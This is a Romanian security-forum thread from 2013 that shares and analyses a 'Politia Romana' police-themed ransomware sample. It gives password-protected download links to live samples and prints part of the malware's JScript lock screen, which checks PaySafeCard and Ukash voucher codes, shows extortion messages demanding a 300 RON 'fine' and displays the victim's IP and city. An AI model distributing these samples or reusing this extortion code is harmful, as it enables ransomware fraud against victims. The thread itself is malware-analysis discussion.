[sample] Virus Politia Romana

[Maximus]

Nu stiu daca a mai fost postat, dar stiu ca cineva a cerut o copie , am cautat inainte sa postez dar nu am gasit nici un link de download ...

Download Link : https://www.dropbox.com/s/an1e3xskyu8kybe/DnceUUyu.rar

Parola arhiva :

a

MARE GRIJA PENTRU AMATORI ! RULATI IN MASINA VIRTUALA, DACA IL EXECUTATI IN PC VA MANCATI SINGURI !!!!

La scurt timp s-a instalat si asta : https://www.dropbox.com/s/ssbsr5bx7pb3ngk/testzo.rar

parola este tot

a

Cum am dat de el :

M-a sunat unu si mi-a explicat ca-l are, m-am chinuit cu un Live CD si l-am cauta prin compu lui vreo 2 ore pana l-am gasit in folderul Startup c:\users\costy\Start Menu\Startup\ , am zis ca-i mai sofisticat si la inceput l-am cautat prin Program data,temp etc .. el era in Startup ... plm a meritat efortul de dragul forumului. Partea cea mai funny e ca live cd-u era cu XP si puteam sa accesez doar cmd-ul, dar a meritat (live cd facut cu BartPE)

Screen : https://www.dropbox.com/s/a8v1m8nbdrkww73/Untitled.jpg

Edited October 15, 2013 by Maximus

[zoondark]

Stiu ca intr-un timp aparuse unul care trebuia sa bagi un cod de cartela reincarcabila de nu stiu cati euro pentru a-ti putea debloca pc-ul.

[yo20063]

Super tare! Ce repede s-a instalat! Abia astept sa-l analizez....de data asta mi-am pus si un meterpreter la startup inainte, sa am o perspectiva si din afara. Good job!

[sulea]

o portiune din virus:

JScript - window script block
	function $(id) {return document.getElementById(id);}

	function ClickBtn(BtnName)
	{
		var objClick = $(BtnName);
		if(objClick.setActive) objClick.setActive();
		objClick.click();		
	}

	function RepeatSymbol(n,symbol)
	{
		var result = "";
		for (var i=0; i<n;i++) result += symbol;
		return result;
	}

	function Validation(paycode, system)
    {
		if(system == "psk")	{

			if(paycode.length != 16 || paycode.match("/^\d+$/")) return false;

			if (paycode.charAt(0) != "0") return false;

			for(var j = 0; j <= 9;j++)
				if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;

			if(paycode.match("1234567")) return false;

			return true;

		} else if (system == "ukash") {

			if(paycode.length != 19 || paycode.match("/^\d+$/")) return false;

			if(paycode.substr(0,6) != "633718") return false;

			for(var j = 0; j <= 9;j++)
				if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;

			if(paycode.match("1234567")) return false;

			return true;

		}

		return false;
	}	


	function SetStatus(statustextid)
	{
		var statustext = "";
		switch(statustextid) {
			case 0:
				statustext = "Pentru a debloca computerul, i pentru a evita alte consecine juridice, vi se cere s plteasc o amend de 300 RON";
				break;
			case 1:
				statustext = "Cod facturare incorect";
				$('ukash_number').value="";
				$('psk_number').value="";
				$('DirtyPayCode').value = "";
				alert("Ai introdus un cod de facturare greit. Verificai datele i repetai procesul de");				
				break;
			case 2:
				statustext = "Codul de facturare prezentat pentru examinare. În mod normal, este nevoie de 3-4 ore. Poate fi o întârziere de pân la 48 de ore";
				break;
			case 3:
				statustext = "CODUL FACTURARE anulat. Poate c codul de facturare a expirat sau fost transferate ctre pri tere";
				break;
			case 4:
				statustext = "Cod facturare incorect";
				break;
			case 5:
				statustext = "Încearc s se conecteze la server";
				break;
			case 6:
				statustext = "Nu a reuit s se conecteze la server";
				break;
			case 7:
				statustext = "Codul este corect. Sistemul va fi deblocat";
				break;
			default:
				statustext = "Rspunsul eroare de la server";
				break;
			}
		$('Status').innerHTML = statustext;
	}

	function SetPayInfo(payinfo)
	{
		var infoArr = payinfo.split("_");
		if(infoArr.length == 3)
		{
			if(infoArr[2] == "psk")	{

				$('psk_number').value = infoArr[0];
				ClickBtn('Button_PSK');

			} else if (infoArr[2] == "ukash") { 

				$('ukash_number').value = infoArr[0];
				ClickBtn('Button_UKASH');

			}
		}
	}

	function SetPersonalInfo(info)
	{
		 var infoArr = info.split("_");

		 for(i=0; i < infoArr.length;i++)
		 {
			if(!infoArr[i].length) continue;

			switch(i)
			{
				case 0:
					var ip_collection = document.getElementsByName('personal_ip');
					for(k=0; k < ip_collection.length; k++)
						ip_collection[k].innerHTML = infoArr[i];		
					break;

				case 1:
					$("personal_isp").innerHTML = infoArr[i];
					break;
				case 2:
					$("personal_city").innerHTML = infoArr[i];
					break;
				case 3:
					$("personal_city").innerHTML += "/"+infoArr[i];
					break;	
			}			
		 }
	}


	function EnterPayCode(paycode, payamount, paysystem) {
		$('DirtyPayCode').value = "";

		if(paycode.length == 0)
				{SetStatus(0); return false;}

		if(!Validation(paycode, paysystem)) 
			{SetStatus(1); return false;}

		$('DirtyPayCode').value = paycode+"_"+payamount+"_"+paysystem;

		SetStatus(5);
		return true;
	}	

	function VirtualKeyboard(inputid, key)
	{
		$(inputid).value+=key;
	}


	// this functions uses only in landing
	function isEmpty(str) 
	{
		return (!str || 0 === str.length);
	}	


	if (!Date.prototype.getFullYear) { 
		Date.prototype.getFullYear = function() { var yy=this.getYear(); return (yy<1900?yy+1900:yy); } ;
	} 

	function SetCurrentDateTime()
	{
			function pad(n) {return n<10 ? '0'+n : n}
			var monthNames = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"];
			var now = new Date();
			now.setMinutes(now.getMinutes()-8);
			date = 	//pad(now.getDate())+'/'
					""
					+ pad(monthNames[now.getMonth()])
					+'/'+ pad(now.getFullYear())
					//+' '+ pad(now.getHours())
					//+':'+ pad(now.getMinutes())
					//+':'+ pad(now.getSeconds());
					//+' '+ now.getTimezoneOffset();

		var date_collection = document.getElementsByName('date');
		for(k=0; k < date_collection.length; k++)
			date_collection[k].innerHTML = date;		
	}	

[APIx00E00]

o portiune din virus:

Daca se poate sefu' baga tot source-ul.

[Gotyc]

Eu nu`i inteleg pe unii de ce nu au antivirus.. am dat sa deschid arhiva deja la vazut blackdoor )